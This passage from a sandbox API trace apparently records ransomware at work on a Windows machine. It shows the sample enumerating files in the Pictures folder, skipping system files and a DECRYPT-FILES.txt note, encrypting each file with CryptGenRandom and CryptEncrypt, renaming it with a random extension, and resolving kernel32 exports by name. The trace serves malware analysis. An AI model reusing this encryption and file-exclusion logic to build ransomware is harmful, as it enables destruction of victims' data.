(lpString="ENUMDATEFORMATSEXA") returned 18 [0086.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.332] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.332] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.332] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.332] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\npHgP3n.jpg") returned 61 [0086.332] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\npHgP3n.jpg.FDqGD") returned 67 [0086.332] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\npHgP3n.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\nphgp3n.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\npHgP3n.jpg.FDqGD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\nphgp3n.jpg.fdqgd"), dwFlags=0x0) returned 1 [0086.333] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.333] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.333] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.334] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ed74a60, ftCreationTime.dwHighDateTime=0x1d4d4da, ftLastAccessTime.dwLowDateTime=0x2ffc6030, ftLastAccessTime.dwHighDateTime=0x1d4d4f2, ftLastWriteTime.dwLowDateTime=0x2ffc6030, ftLastWriteTime.dwHighDateTime=0x1d4d4f2, nFileSizeHigh=0x0, nFileSizeLow=0x1442b, dwReserved0=0x0, dwReserved1=0x0, cFileName="twKvLTg.gif", cAlternateFileName="")) returned 1 [0086.334] lstrcmpiW (lpString1="twKvLTg.gif", lpString2="DECRYPT-FILES.txt") returned 1 [0086.334] lstrcmpiW (lpString1="twKvLTg.gif", lpString2="autorun.inf") returned 1 [0086.334] lstrcmpiW (lpString1="twKvLTg.gif", lpString2="boot.ini") returned 1 [0086.334] lstrcmpiW (lpString1="twKvLTg.gif", lpString2="desktop.ini") returned 1 [0086.334] lstrcmpiW (lpString1="twKvLTg.gif", lpString2="ntuser.dat") returned 1 [0086.334] lstrcmpiW (lpString1="twKvLTg.gif", lpString2="iconcache.db") returned 1 [0086.334] lstrcmpiW (lpString1="twKvLTg.gif", lpString2="bootsect.bak") returned 1 [0086.334] lstrcmpiW (lpString1="twKvLTg.gif", lpString2="ntuser.dat.log") returned 1 [0086.334] lstrcmpiW (lpString1="twKvLTg.gif", lpString2="thumbs.db") returned 1 [0086.334] lstrcmpiW (lpString1="twKvLTg.gif", lpString2="Bootfont.bin") returned 1 [0086.334] lstrlenW (lpString="twKvLTg.gif") returned 11 [0086.334] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0086.334] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0086.334] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0086.334] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0086.334] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0086.334] lstrlenW (lpString="twKvLTg.gif") returned 11 [0086.334] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0086.334] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="twKvLTg.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\twKvLTg.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\twKvLTg.gif" [0086.334] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\twKvLTg.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\twkvltg.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0086.335] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=82987) returned 1 [0086.335] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0086.335] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.335] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.335] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.335] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.335] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0086.336] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0086.337] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.337] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.338] CloseHandle (hObject=0x43c) returned 1 [0086.338] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.338] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0086.339] CloseHandle (hObject=0x0) returned 0 [0086.339] CloseHandle (hObject=0x438) returned 1 [0086.339] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.339] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.340] GetTickCount () returned 0x114e090 [0086.340] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.340] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.340] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.340] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.340] lstrlenA (lpString="kernel32.dll") returned 12 [0086.341] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.341] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.341] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.341] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.341] lstrlenA (lpString="ADDATOMA") returned 8 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.341] lstrlenA (lpString="ADDATOMW") returned 8 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.341] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.341] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.341] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.341] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.341] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.341] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.341] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.341] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.341] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.341] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.341] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.342] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.342] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.342] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.342] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.342] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.342] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.342] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.342] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.342] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.342] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.342] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.342] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.342] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.342] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.342] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.342] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.342] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.342] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.342] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.343] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.343] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.343] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.343] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.343] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.343] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.343] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.343] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.343] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.343] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.343] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.343] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.343] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.343] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.343] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.343] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.343] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.343] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.343] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.344] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.344] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.344] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.344] lstrlenA (lpString="BEEP") returned 4 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.344] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.344] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.344] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.344] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.344] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.344] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.344] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.344] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.344] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.344] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.344] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.344] lstrlenA (lpString="CANCELIO") returned 8 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.344] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.344] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.344] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.345] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.345] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.345] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.345] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.345] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.345] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.345] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.345] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.345] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.345] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.345] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.345] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.345] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.345] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.345] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" 